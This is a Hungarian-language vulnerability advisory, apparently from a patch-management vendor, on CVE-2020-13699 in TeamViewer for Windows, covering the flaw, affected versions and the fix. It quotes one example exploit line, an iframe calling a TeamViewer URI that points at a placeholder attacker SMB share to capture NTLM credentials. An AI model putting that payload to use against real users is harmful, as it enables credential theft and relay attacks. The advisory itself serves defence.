Egy nagy kockázatú sebezhetőséget találtak a Windows-os TeamViewerben. A “CVE-2020-13699” néven nyomon követhető, “8.8” CVSS alappontszámmal, amelyet távoli támadók kihasználva feltörhetik a felhasználók jelszavát, és ezután a rendszer további kihasználásához vezethetnek.

A TeamViewer egy távoli vezérlésre, asztali megosztásra, online megbeszélésekre, webkonferenciákra és számítógépek közötti fájlátvitelre szolgáló szoftveralkalmazás, amelyet a német TeamViewer GmbH fejlesztett ki. A TeamViewer elérhető Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8 és BlackBerry operációs rendszerekhez. A TeamViewert futtató rendszerhez webböngészővel is hozzá lehet férni.

A közelmúltban a COVID-19 Pandemic work from home culture shift miatt megnőtt a távoli kapcsolódási szoftveralkalmazások használata.

(CVE-2020-13699) Vulnerability Details:

• A CVE-2020-13699 egy biztonsági hiba, amely egy nem idézett keresési útvonalból vagy elemből ered. Konkrétan ez a sebezhetőség abból adódik, hogy az alkalmazás nem megfelelően idézi az egyéni URI-kezelőit.

• A telepített sebezhető TeamViewer-verzióval rendelkező felhasználót egy rosszindulatúan kialakított weboldal meglátogatására csábítják, hogy kihasználja ezt a sebezhetőséget.

• A sebezhetőséget felfedező és nyilvánosságra hozó Jeffrey Hofmann, a Praetorian biztonsági mérnöke szerint “A támadó rosszindulatú iframe-et ágyazhat be egy weboldalba, amelynek URL-je hamisított (iframe src=’teamviewer10: -play \\\\attacker-IP\share\fake.tvs’), amely elindítja a TeamViewer Windows asztali klienst, és távoli SMB-megosztás megnyitására kényszeríti.”
• A Windows NTLM-hitelesítést hajt végre az SMB-megosztás megnyitásakor. Ez a kérés továbbítható, azaz lehetővé teszi egy támadó számára, hogy rögzítse a hitelesítést, és elküldje egy másik kiszolgálónak, ami lehetővé teszi számára, hogy műveleteket hajtson végre a távoli kiszolgálón a hitelesített felhasználó jogosultságával.
• E sebezhetőség sikeres kihasználása lehetővé teheti egy távoli támadó számára, hogy tetszőleges paraméterekkel indítsa el a TeamViewert. Az alkalmazás arra kényszeríthető, hogy NTLM hitelesítési kérést továbbítson a támadó rendszerére, ami lehetővé teszi az offline szivárványtábla-támadásokat és a nyers erővel történő feltörési kísérleteket.

• Ezek a támadások a sebezhetőség sikeres kihasználásából származó ellopott hitelesítő adatok miatt további kihasználáshoz vezethetnek.

A közzététel szerint nincs bizonyíték a sebezhetőség kihasználására.

A CIS szerint a kihasználás kockázata magas a kormányzati intézmények és a közepes méretű vállalatok számára. A kisvállalatok esetében a kockázat közepes, az otthoni felhasználók esetében pedig alacsony.

Impact
A sebezhetőség kihasználása lehetővé teheti a távoli támadók számára, hogy érzékeny hitelesítő adatokhoz jussanak, vagy teljes irányítást szerezzenek az érintett rendszer felett.

Érintett termékek
TeamViewer Windows Desktop Application before to 8.0.258861, 9.0.258860, 10.0.258873,11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 és 15.8.3.

megoldás
ATeamViewer közzétett egy biztonsági frissítést, amely a CVE-2020-13699-et kezeli.

SanerNow biztonsági tartalom a sebezhetőség észlelésére és csökkentésére. Erősen javasoljuk a biztonsági frissítés alkalmazását a közzétett támogatási cikkünk utasításaival.